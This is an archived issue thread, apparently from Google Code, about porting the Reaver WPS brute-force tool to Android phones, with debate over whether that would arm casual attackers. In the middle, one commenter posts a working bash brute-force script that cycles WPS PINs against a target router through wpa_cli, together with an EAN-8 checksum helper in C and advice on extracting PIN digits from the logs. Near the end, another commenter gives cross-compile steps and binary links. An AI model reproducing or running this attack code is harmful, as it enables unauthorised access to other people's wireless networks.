Open GoogleCodeExporter opened 9 years ago
Can you get packet injection working on your android phone?
I guess that might/will be the biggest problem.
Unless you can inject packets I don't see it happening
Original comment by jcdento...@gmail.com
on 31 Dec 2011 at 2:29
Some time ago i made working monitor mode and packet injection on g1 ( wifi
chipset wl1251 ) thx to n900 patches so at least on g1 / hero / magic ( all got
wl1251 ) it should be possible.
http://forum.xda-developers.com/showthread.php?t=1271854
Original comment by zewe...@gmail.com
on 31 Dec 2011 at 4:53
[deleted comment]
Supply me an android phone that will do monitor+inject and I will make it
happen.
-peter
Original comment by peac...@tacnetsol.com
on 1 Jan 2012 at 1:39
[deleted comment]
If an A855 Motorola Droid can do monitor+inject, I can produce a working
handset.
Original comment by a...@findlaypc.com
on 3 Jan 2012 at 12:48
Most Motorola phones use TI chipsets which are not capable.
Original comment by peac...@tacnetsol.com
on 3 Jan 2012 at 2:58
If i provid a micro linux embedded device that run an OpenWrt distro may be is
possible release a porting ?
Original comment by spyphone...@gmail.com
on 4 Jan 2012 at 1:22
Original comment by cheff...@tacnetsol.com
on 11 Jan 2012 at 4:54
Some devices support USB-OTG, which would enable a kernel module, like rtl8187,
for use with a USB wireless adapter.
Original comment by ryanjna...@gmail.com
on 13 Jan 2012 at 7:04
I think that this tool needs to stay on PC.Because today any kiddie with this
tool and Android smartphone can then hack their neighbors network and do all
kinds of trouble.And honestly we don't want increase of kid hackers.
Original comment by renny.to...@gmail.com
on 5 Feb 2012 at 1:42
not just that but this tool boots clients off their routers.. we don't need
this in the hands of idiots =] or a windows version
what's wrong with a netbook like the eee? < 1 sec a pin on a cisco router.. I
wish there was a paypal to donate- I'd send a few bucks.. some really good code
here and he's integrating it into aircrack.. I see the site is selling a idiot
box to do this but if you have 600 bucks to throw around- then you are probably
proficient in other areas of life.. so have at it- I'm worried about the 12
year old snufalufagus with his phone denying his neighbors wifi by pressing a
button
it's like giving airpwn and a yagi to a moron and expecting him not to use it
on starbucks
between this and pyrit, it's no wonder I run wired at home with a long pass to
my ap.. even the brand new att routers are still vulnerable to the same attacks
as the last set, 100% breakable with the default key using wpa2.. who's in
charge of security over there, a cow maybe
Original comment by benbar...@gmail.com
on 5 Feb 2012 at 4:38
Considering that there is little consistency regarding android hardware this is
not the most likely port to occur, if it does then no doubt people will have to
buy the appropriate model (and revision) of phone (and a few sets of spare
batteries)
I'm sensing childishness though regarding the seeming anger regarding script
kiddies, do you really think that the script kiddies don't have laptops &
netbooks? If you where particularly knowledgeable you wouldn't be shouting
about keeping the tool PC only.
With Beagleboards, shivaplugs, Raspberry Pi and modded Pogoplugs there are a
multitude of low power consumption devices with USB (to use a network adaptor
of choice) to cause problems with (high powered antenna are not necessary with
such a setup) so don't be getting so precious folks, calm down
BTW there is real Wifi kit out there (I work with it) that live in retail
chains (and corporate land) strangely enough they do not use WPS, yes they have
been checked since christmas (to make sure they don't respond anyway), they are
much more interesting to play with than the average SoHo equipment
Original comment by kilby.ct...@gmail.com
on 6 Feb 2012 at 12:34
[deleted comment]
laptops and netbooks with windows running vmware and bt? yeah that's exactly
what they run.. but they've been limited to open and wep networks usually..
wpa2 solved with crunch piped to pyrit | cowpatty at 100k+/sec or dictionary
attack without a pre generated rainbow table is still out of skill set of the
snuffaluffagus.. they know nothing about these specific attacks or specialized
attacks on different types of routers, nothing because it takes more than
./configure make && make install..
reaver is so easy and automated, if it were to be ported to say ios for example
(jailbroke)- not just android (and it worked even with specific mass produced
phones), there would be jackass bowel movements all over the world.. I don't
care if a responsible geek manages to do this.. just the code he has written
here is almost too slick if you know what I'm sayin- he could have thrown in
some monkey wrenches =p I'm just sayin.. felt the same way about armitage..
anyways it's just my opinion on the matter.. what's sad is I noticed business
around here still running wep (even the bmw dealership's office runs wep here)
and at&t up to last year was still installing their 2wire routers with wep as
default
now they've switched to wpa2 but still have the same problem with the default
passkey, 10 characters numeric- that's 30 hours in pyrit for all the keys.. if
the wps pin attack didn't act like a dos on the router, I might not care- just
in the wrong hands this is a double butt violater
Original comment by benbar...@gmail.com
on 6 Feb 2012 at 9:14
I have to admit that for me an android version of reaver would be useful as the
people who hold the purse strings would get upset at a phone being used to
break their network security. For some reason 'management' still think that 'IT
professionals' are the only people on earth who have laptops (whatever an IT
professional is)
Anyway this will now be heading off topic
The biggest script kiddies I have ever encountered are so called professional
pen testers, they have their bought copy of Nessus on windows and a VM with
Backtrack then they simply follow their course notes, usually without much
understanding of the 'security issues' which they encounter.
However it has to be remembered that tomorrows talented 'security researchers'
are todays beginners and very few beginners start with original methods.
Without reaver (or the other python script) would you be playing with WPS
breaking ?
I can answer an honest NO (for myself), though 15-20 years ago the answer would
have been Yes, as my life permitted me time to write interesting things.
If your answer is 'no' then please don't complain about idiots who have the
same tools as you, it happens and they have as much right as you have.
I used to be really uptight about the undeserving cut & paste coders &
crackers, I'm older now.
re: There's poor security all over though sometimes there are reasons (mostly
arrogance, ignorance and cost) but sometimes its unavoidable legacy kit is
common, but the risk may be mitigated with careful firewalling, IDS and sanity
checking
Be thankful the tool exists in a reliable version and encourage it's spread to
other platforms, you may have need of it at some point
Original comment by kilby.ct...@gmail.com
on 7 Feb 2012 at 10:28
motorola backflip here, is the same shit that my laptop, (broadcom stuff), as
far as i tried, just could enable monitor mode (buggy) and packets injection is
impossible, im pretty sure it can be done on another phone using a different
wlan chipset.
Original comment by frapeti@gmail.com
on 25 Feb 2012 at 3:34
Just wait for a recent kernel. Thanks to mac80211 nearly every recent driver in
the vanilla kernel supports package injection and monitor mode. Android phones
has just mostly very old kernel running.
Original comment by gentoo.l...@gmail.com
on 26 Feb 2012 at 4:17
If tcpdump, wpa_cli and bash are available for android, which a quick bit of
recon tells me they are.
Then a workaround is more than likely possible. ;)
Original comment by ObiDanKi...@googlemail.com
on 28 Feb 2012 at 12:30
For those who are alright with their programming, heres some basic building
blocks for a potential android wps tester. I'm just beginning programming, but
with a bit of help i rustled this up...this is the latest code i have working
thus far on a regular system that is....
Pre-requisites that would need to be working already on android are...
Bash
Tcp-dump,
Wpa-cli/wpa_supplicant
Tee
Ean8 (seperate module...i will include code as a suffix)
Heres the code i have working at the mo....The lines may get messed up, so I've
used me newly created #EL Tags to show where new lines are. Remove at own
discretion.
Name this file wpstester, or whatever you like ;), set its permissions, jobs a
good un. This is fairly system specific so you might need to tweak it here and
there to get it working properly.
#!/bin/bash #EL
sudo tcpdump -i wlan0 -v -l 2> /dev/null | tee /home/$USER/log.txt & #EL
sleep 7 #EL
for i in {0..1}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 15 #EL
done #EL
for i in {2..2000}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 10 #EL
done #EL
sudo kill -9 2> /dev/null $(ps -A | grep tcpdump | awk '{print$1}') #EL
exit 0 #EL
And the Ean8 Module.....
#include <stdio.h> #include <stdlib.h> #include <string.h>
int main(int argc, char argv) {
int i, odd_sum = 0, even_sum = 0, sum, check_digit; // to install 'make ean8' or 'gcc -o ean8 ean8.c' char base; // then move exe to /bin path.
if (argc != 2) {
fprintf(stderr, "Error: Wrong number of arguments\n"); exit(EXIT_FAILURE);
}
base = argv1?;
if (strlen(base) != 7) {
fprintf(stderr, "Error: Argument is not 7 characters\n"); exit(EXIT_FAILURE);
}
for (i = 0; i < 7; i += 2) {
// Odd digits odd_sum += basei? - '0';
}
for (i = 1; i < 7; i += 2) {
// Even digits even_sum += basei? - '0';
}
sum = odd_sum 3 + even_sum; check_digit = (10 - (sum % 10)) % 10; printf("%s%d\n", base, check_digit);
return(EXIT_SUCCESS);
}
Theres some other little tweaks you may have to do as well, to a couple of the
other programs, I've posted what i did with those on the hints and tips part of
this forum.
Maybe this will help someone along the line come up with a workaround for
android...who knows.....If a reaver port isn't forthcoming.
Only downside is this workaround is a bit slower than reaver, until i figure
out how to implement small dh keys by tweaking the code in more than likely
wpa_supplicant/wpa_cli.
Good luck dudes/dudettes ;)
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 3:29
P.s the third sleep command can be set as a variable to whatever you find the
minimum try time is before you fry/crash the router you are testing.
There is a trend i noticed whereby the first 1-2 tries take slightly longer
than the average send time, and if you put a longer sleep time for the first
1-2 attempts, then the following attempts can actually be sped up
significantly. Granted this isn't as fast as reavers small dh-keys, but for a
work-around i guess its o.k ;)
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 3:36
Sorry triple post....Then you just have to grep the log files for 'id 4'. (Off
the top of my head, might be 'id 3' though =P) That result cross-correlates
with the time in the other log-file and there you have the first 4 digits of
the wps pin.
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 3:40
Haha sorry last thing.
In the original post on the hints and tips part i mentioned using wireshark.
You can use this method if you want, but the newer post above, creates a
semi-automatic solution, (i.e its better). By using the generically available
tcpdump instead, and integrating it as a co-process in the source-code.
Perhaps someone else can then take this and fully-automate it, the next step
was to integrate a sectional grepping procedure...i.e test 1..100 pins then
stop grep...check for 'id 3 (or 4)'continue...
I suppose i can continue my quest though, its actually a fascinating project
for learning a little programming =P.
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 4:00
Any progress with reaver working with android?
Original comment by sheen...@googlemail.com
on 15 May 2012 at 9:11
Yes. Put backtrack 5 on android!
Original comment by ffej5...@gmail.com
on 18 Jun 2012 at 3:53
N900 and N950 has reaver.
Original comment by ifle...@gmail.com
on 11 Aug 2012 at 9:40
[deleted comment]
[deleted comment]
Monitor mod in android un possible. http://bcmon.blogspot.fi/. now only what we
need is reaver :)
Original comment by pta...@gmail.com
on 23 Sep 2012 at 1:56
OMG, so much thanks for that link !!!!1 ;DDDD
Original comment by fals3...@gmail.com
on 23 Sep 2012 at 3:12
Anyway Reaver needs root, that's why it wouldn't be program for children :-)
Original comment by NosovK
on 29 Sep 2012 at 11:16
Is there any way to boot it in Symbian OS?
Original comment by kostad...@yahoo.com
on 29 Jan 2013 at 12:20
Any updates? I'd love to get reaver on my phone.
Original comment by jellekoo...@gmail.com
on 2 Mar 2013 at 11:18
hey there android supports now rtl 8187 chipset in monitor mode via USB-OTG no
root required
http://www.kismetwireless.net/android-pcap/
might be that injection would work too... so anyone out there ready to make
reaver-android port??
Original comment by gustarba...@gmail.com
on 4 Mar 2013 at 10:56
HD2 with Android and Backtrack installed.
I have compiled and installed bcm4329 driver with monitor mode that works
correctly with airomon and aireplay.
Also, I have compiled and installed Reaver, but there is support problem.
Reaver will not associate (timeout occur).
After aireplay fakeauth Reaver associate but start getting
WARNING: Receive timeout occurred
Recorder PCAP file with both Reaver association attempt and after areplay
association:
https://www.dropbox.com/s/bjsq8q2hfuyv7tc/rr-02.cap
Original comment by petar.bojovic.paxy@gmail.com
on 23 Jun 2013 at 8:34
Just checked from other computer that monitored same AP activity. There is no
any packet actually sent from HD2 via Reaver.
Only when I used areplay packet was really sent.
rr-02.cap shows packet cap from same device as Reaver.
Driver Developer mentioned following:
"Radiotap - we don't handle radiotap on packet injection. 'aireplay-ng' works
fine with it but tools like 'reaver' seem to require it."
Can you make a support for packet injection without Radiotap ? (Like on
aireplay)
Original comment by petar.bojovic.paxy@gmail.com
on 23 Jun 2013 at 11:28
People new update on monitor mode on Android:
http://bcmon.blogspot.de/2013/07/monitor-mode-reloaded_14.html
As far as i know that was one of the big problem to not having Reaver ported to
Android.
#35
How did you compile and install Reaver on Android? I'm on a Nexus 7 with
CyanogenMod 10.1.2. Thanks in advance.
Original comment by lord...@gmail.com
on 23 Jul 2013 at 11:29
Done.
http://forum.xda-developers.com/showthread.php?t=2456888
Original comment by davidw.s...@gmail.com
on 24 Sep 2013 at 7:49
BCMON.apk does not work correctly with HD2 (ICS myMIUI ROM).
ping_bcmon does not returns packets.
I have tested supplied reaver with older (2012) bcmon kernel module drivers,
reaver starts fine but will not inject packets. Function pcap_inject is
processed without exception but packet do not leave interface.
Original comment by petar.bojovic.paxy@gmail.com
on 26 Sep 2013 at 8:40
I feel like no one read anything that was being written on this blog
previously. Did no one notice that it's a good thing to not have tons of people
have this on their iPhones? Keep it to yourself. Don't post android ROMs with
reaver already installed online. Just do it by yourself. Do not jeopardize
Internet security for temporary happiness. That's terrorism. I feel like there
are only a few software engineers who would like to be terrorists.
Original comment by BflatMas...@gmail.com
on 27 Oct 2013 at 12:10
Ok calm down francis
Original comment by peeon...@gmail.com
on 27 Oct 2013 at 12:26
Jeopardizing Internet security? Sheesh.
If Reaver works on it, it was already insecure long before it became easy...
Original comment by a...@findlaypc.com
on 27 Oct 2013 at 3:43
Hello every one , does any one can help to install reaver it gives me error
pleaseeeeeeeeee:
./configure
checking for gcc... gcc
checking whether the C compiler works... no
configure: error: in `/root/reaver-1.4/src':
configure: error: C compiler cannot create executables
See `config.log' for more details.
Original comment by tawakoli...@gmail.com
on 30 Oct 2014 at 11:30
i installed bcmon and reaver for android but when i opened RfA and test the
monitor mode it showed me an error that monitor mode activation failed what to
do now
Original comment by ajaybish...@gmail.com
on 12 Feb 2015 at 4:40
[deleted comment]
[deleted comment]
Porting reaver-wps for android ARM platform
Steps:
1 - install crosscompiler ARM GNUEABI ( sudo apt-get install
gcc-4.7-arm-linux-gnueabi g++-4.7-arm-linux-gnueabi)
2 - Download http://www.infradead.org/~tgr/libnl/files/libnl-3.2.25.tar.gz
3 - Download http://www.tcpdump.org/release/libpcap-1.7.4.tar.gz
4 - Download Reaver-WPS source
5 - extract libnl-3.2.25.tar.gz and libpcap-1.7.4.tar.gz
6 - execute configure script for build Makefile LIBNL3(./configure
--prefix=/system --host=arm-linux-gnueabi LDFLAGS='-static -L/system/lib' &&
make && sudo make install
7 - execute configure script for build Makefile LIBPCAP(./configure
--prefix=/system --host=arm-linux-gnueabi --with-pcap=linux
CFLAGS='-I/system/include/libnl3' LDFLAGS='-static -L/system/lib' && make &&
sudo make install
8 - download https://www.sqlite.org/2015/sqlite-autoconf-3081101.tar.gz SQLITE3
( /configure --prefix=/system --host=arm-linux-gnueabi
CFLAGS='-L/system/include' LDFLAGS='-static -L/system/lib' && make && sudo make
install)
9 Configuring for compiler ARM Reaver-WPS ./configure --prefix=/system
--sysconf=/etc && make V=1 CC=arm-linux-gnueabi-gcc CFLAGS='-pthread -s -static'
10 copy files wash and reaver static compiled to /system/xbin in rooted device
(my rooted CM12 device is XT1069 using Dongle USB OTG TL-WR721N TPKINK firmware
kernel ath9k_htc modules ARM)
compiled binary files static
https://mega.co.nz/#!ZcN0EZoZ!DSSGCI4VV1O9eNd-fzmcr0Hu-t5XWxHfU9RJcaSn8D4
https://mega.co.nz/#!wd1EFZia!bROKZ4TFKx24w7niTMcZCU1YGw3D-QpwWUl5AZhW4uY
Reaver-WPS GUI APK
http://forum.xda-developers.com/showthread.php?t=2456888
have Fun :)
Original comment by mudg...@gmail.com
on 1 Aug 2015 at 3:26
Original issue reported on code.google.com by
fals3...@gmail.com
on 31 Dec 2011 at 1:49